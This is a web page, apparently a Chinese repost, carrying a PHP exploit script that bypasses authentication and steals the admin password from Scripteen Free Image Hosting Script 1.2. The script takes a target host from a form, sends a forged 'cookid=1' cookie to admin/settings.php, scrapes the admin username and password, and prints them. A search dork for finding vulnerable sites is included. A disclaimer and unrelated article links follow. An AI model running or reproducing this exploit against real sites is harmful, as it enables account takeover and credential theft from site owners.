Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

时间：2021-05-23

<?php

error_reporting("E_ALL");
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$desen='|value="(.*)"|siU';
function yolla($host,$paket)
{
global $veri;
$ac=fsockopen(gethostbyname($host),80);
if (!$ac) {
echo 'Unable to connect to server '.$host.':80'; exit;//Bağlanamaz ise
}
fputs($ac,$paket);
$veri="";
while (!feof($ac)) {
$veri.=fread($ac,1);
}
fclose($ac);
}
?>
<h2>Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit</h2>
Coded By RMx - Liz0ziM
Web:<a href="http://" target="_blank"></a> 
Dork:"Powered by Scripteen Free Image Hosting Script V1.2"
<form method="POST" action="">
TARGET HOST:
<input name="host" type="text" />
Example:
TARGET PATH: <input name="klasor" type="text" />
Example:/ or /scriptpath/ 
<input name="yolla" type="submit" value="Send" />
</form> 
<? if($_POST[yolla]){
$host=$_POST[host];
$klasor=$_POST[klasor];
$admin=$_POST[admin];
$p=$klasor."admin/settings.php";
echo 'Sending Exploit.. ';
$packet ="GET ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cookid=1\r\n";
$packet.="Connection: Close\r\n\r\n";
yolla($host,$packet);
preg_match_all($desen,$veri,$cik);
$ad=$cik[1][0];
$sifre=$cik[1][1];
if($ad AND $sifre){
echo '
Exploit succeeded... 
Admin Username:'.$ad.' 
Admin Password:'.$sifre.' ';
}
else
{
echo 'Exploit Failed !';
}
}
?>

声明：本页内容来源网络，仅供用户参考；我单位不保证亦不表示资料全面及准确无误，也不保证亦不表示这些资料为最新信息，如因任何原因，本网内容或者用户因倚赖本网内容造成任何损失或损害，我单位将不会负任何法律责任。如涉及版权问题，请提交至online#300.cn邮箱联系删除。

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

相关文章

解决Nginx 配置 proxy_pass 后 返回404问题

深入理解C++中的new/delete和malloc/free动态内存管理及区别介绍

linux查看内存的大小

总结python中pass的作用

PoisonIvy Rat 远程溢出实战

解决Nginx 配置 proxy_pass 后返回404问题